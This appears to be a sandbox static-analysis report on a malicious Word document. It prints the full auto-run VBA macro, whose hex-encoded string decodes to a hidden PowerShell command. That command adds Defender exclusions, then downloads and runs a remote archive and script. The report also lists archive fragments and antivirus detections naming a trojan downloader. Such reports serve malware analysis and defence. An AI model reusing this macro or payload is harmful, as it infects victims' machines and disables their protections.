popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim longString As String
longString = ("706F7765727368656C6C2E657865202D652063414276414863415A51427941484D416141426C4147774162414175414755416541426C414341414C514246414867415A51426A41485541644142704147384162674251414738416241427041474D41655141674147494165514277414745416377427A414341414C5142754147384163414279414738415A674270414777415A5141674143304164774270414734415A414276414863416377423041486B416241426C4143414161414270414751415A41426C414734414941417441474D416277427441473041595142754147514149414169414534415A5142334143304153514230414755416251416741433041554142684148514161414167414363415177413641467741584142554147554162514277414677415841416E414341414C51424A414851415A5142744146514165514277414755414941424541476B416367426C41474D41644142764148494165514137414545415A41426B4143304154514277414641416367426C4" & _
              "14759415A514279414755416267426A4147554149414174414555416541426A414777416451427A41476B41627742754146414159514230414767414941416E41454D414F674263414651415A514274414841415841416E414473415151426B414751414C51424E4148414155414279414755415A67426C414849415A51427541474D415A514167414330415251423441474D416241423141484D416151427641473441554142684148514161414167414363414A41426C414734416467413641454541554142514145514151514255414545414A774137414367415467426C414863414C514250414749416167426C41474D416441416741464D416551427A414851415A514274414334415467426C414851414C6742584147554159674244414777416151426C414734416441417041433441524142764148634162674273414738415951426B4145594161514273414755414B41416E41476741644142304148414163774136414338414C77426941476B416441426941485541597742724147554164414175414738416367426E414338415A6742764148674165414273414849415A514277414338416367426C414841416277417641475141627742334147344162414276414745415A41427A4143384165674270414841414C67423641476B416341416E414377414A77424" & _
              "441446F4158414263414651415A5142744148414158414263414534415A5142334147594161514273414755414C67423641476B416341416E41436B414F7742464148674163414268414734415A414174414545416367426A414767416151423241475541494141744146414159514230414767414941416E41454D414F674263414677415641426C4147304163414263414677415467426C414863415A674270414777415A51417541486F41615142774143634149414174414551415A51427A414851416151427541474541644142704147384162674251414745416441426F414341414A77424441446F4158414263414651415A51427441484141584142634143634149414174414559416277427941474D415A51413741464D41644142684148494164414174414641416367427641474D415A51427A41484D4149414277414738416477426C414849416377426F4147554162414273414334415A5142344147554149414174414545416367426E414855416251426C414734416441424D41476B4163774230414341414A77424441446F4158414263414651415A514274414841415841426341484D415977427941476B4163414230414334416341427A414445414A77416941413D3D")
             
 fqwkflj21lkj312f = fkqkfh1j2kh31271fj(longString)

 Shell (fqwkflj21lkj312f)

End Sub

Function fkqkfh1j2kh31271fj(InitialString As String) As String
    Dim i As Long
    For i = 1 To Len(InitialString) Step 2
        fkqkfh1j2kh31271fj = fkqkfh1j2kh31271fj & Chr("&H" & (Mid(InitialString, i, 2)))
    Next i
End Function

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim longString As String
longString = ("706F7765727368656C6C2E657865202D652063414276414863415A51427941484D416141426C4147774162414175414755416541426C414341414C514246414867415A51426A41485541644142704147384162674251414738416241427041474D41655141674147494165514277414745416377427A414341414C5142754147384163414279414738415A674270414777415A5141674143304164774270414734415A414276414863416377423041486B416241426C4143414161414270414751415A41426C414734414941417441474D416277427441473041595142754147514149414169414534415A5142334143304153514230414755416251416741433041554142684148514161414167414363415177413641467741584142554147554162514277414677415841416E414341414C51424A414851415A5142744146514165514277414755414941424541476B416367426C41474D41644142764148494165514137414545415A41426B4143304154514277414641416367426C4" & _
              "14759415A514279414755416267426A4147554149414174414555416541426A414777416451427A41476B41627742754146414159514230414767414941416E41454D414F674263414651415A514274414841415841416E414473415151426B414751414C51424E4148414155414279414755415A67426C414849415A51427541474D415A514167414330415251423441474D416241423141484D416151427641473441554142684148514161414167414363414A41426C414734416467413641454541554142514145514151514255414545414A774137414367415467426C414863414C514250414749416167426C41474D416441416741464D416551427A414851415A514274414334415467426C414851414C6742584147554159674244414777416151426C414734416441417041433441524142764148634162674273414738415951426B4145594161514273414755414B41416E41476741644142304148414163774136414338414C77426941476B416441426941485541597742724147554164414175414738416367426E414338415A6742764148674165414273414849415A514277414338416367426C414841416277417641475141627742334147344162414276414745415A41427A4143384165674270414841414C67423641476B416341416E414377414A77424" & _
              "441446F4158414263414651415A5142744148414158414263414534415A5142334147594161514273414755414C67423641476B416341416E41436B414F7742464148674163414268414734415A414174414545416367426A414767416151423241475541494141744146414159514230414767414941416E41454D414F674263414677415641426C4147304163414263414677415467426C414863415A674270414777415A51417541486F41615142774143634149414174414551415A51427A414851416151427541474541644142704147384162674251414745416441426F414341414A77424441446F4158414263414651415A51427441484141584142634143634149414174414559416277427941474D415A51413741464D41644142684148494164414174414641416367427641474D415A51427A41484D4149414277414738416477426C414849416377426F4147554162414273414334415A5142344147554149414174414545416367426E414855416251426C414734416441424D41476B4163774230414341414A77424441446F4158414263414651415A514274414841415841426341484D415977427941476B4163414230414334416341427A414445414A77416941413D3D")
             
 fqwkflj21lkj312f = fkqkfh1j2kh31271fj(longString)

 Shell (fqwkflj21lkj312f)

End Sub

Function fkqkfh1j2kh31271fj(InitialString As String) As String
    Dim i As Long
    For i = 1 To Len(InitialString) Step 2
        fkqkfh1j2kh31271fj = fkqkfh1j2kh31271fj & Chr("&H" & (Mid(InitialString, i, 2)))
    Next i
End Function

Original

                                        Attribute VB_Name = "NewMacros"
Sub fqwfqwdsa()
'
' fqwfqwdsa Macro
'
'

End Sub

Deobfuscated

                                        Attribute VB_Name = "NewMacros"
Sub fqwfqwdsa()
'
' fqwfqwdsa Macro
'
'

End Sub
[Content_Types].xml
/L[E'9
_rels/.rels
word/_rels/document.xml.rels
X=c+(\
word/document.xml
tN'ahY
word/vbaProject.bin
!jo['
&kGN~W
qV.pM]
q&c+aV}7
mmT>zt
mDN[!p
xx3/z7
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/theme/theme1.xml
p{{<F!
wm1NDN
FM26P[
word/vbaData.xml
2%2tCSj
word/settings.xml
8'=o`@
docProps/app.xml
word/styles.xml
w<j0y
5/e"[c&
Pwq<nDs<fCs<^Bs<VAs<N@s<
E%%'b}
Tf[|p=
g/Dg{N
ZlWGZG
Pzz1xa
g?!Hj\
'd/&\j\
docProps/core.xml
8B:q]iA
word/fontTable.xml
t@Qd[T
word/webSettings.xml
f\US}d
,y0|yh}
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/vbaProject.binPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
DrWeb Clean
MicroWorld-eScan VB.Heur.PwShell.18.F361B9BD.Gen
ClamAV Win.Dropper.AgentTesla-9969002-0
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE VB.Heur.PwShell.18.F361B9BD.Gen
Sangfor VBA.Sus.Obf
Trustlook Clean
BitDefender VB.Heur.PwShell.18.F361B9BD.Gen
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec CL.Downloader!gen69
ESET-NOD32 a variant of VBA/TrojanDownloader.Agent.YBD
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Adb.a
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
Rising Malware.Obfus/VBA@AI.100 (VBA)
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.lc
FireEye VB.Heur.PwShell.18.F361B9BD.Gen
Emsisoft VB.Heur.PwShell.18.F361B9BD.Gen (B)
Ikarus Clean
Avast-Mobile Clean
Jiangmin Clean
Avira Clean
MAX malware (ai score=83)
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit VB.Heur.PwShell.18.F361B9BD.Gen
ViRobot Clean
ZoneAlarm HEUR:Trojan.Script.Adb.a
GData VB.Heur.PwShell.18.F361B9BD.Gen
Google Detected
AhnLab-V3 Clean
Acronis suspicious
VBA32 Clean
ALYac Clean
TACHYON Suspicious/WOX.XSR.Gen
Zoner Clean
Tencent Clean
Yandex Clean
SentinelOne Static AI - Malicious OPENXML
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.